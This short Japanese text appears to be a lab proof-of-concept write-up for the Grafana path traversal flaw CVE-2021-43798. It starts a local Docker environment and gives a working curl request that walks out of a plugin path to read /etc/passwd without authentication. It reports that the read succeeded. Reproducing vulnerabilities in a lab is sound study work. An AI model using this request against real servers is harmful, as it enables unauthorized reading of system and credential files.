
Grafanaのパストラバーサル脆弱性(CVE-2021-43798)の概念実証エクスプロイト。プラグインパスでのディレクトリトラバーサルを介して、認証なしのファイル読み取りが可能になります。
../ のような特殊文字を使用してファイルパスを操作できる Path Traversal 脆弱性が存在します。
docker-compose up -d
curl --path-as-is http://localhost:3000/public/plugins/alertlist/../../../../../../../../etc/passwd を通じて etc/passwd にアクセスできた。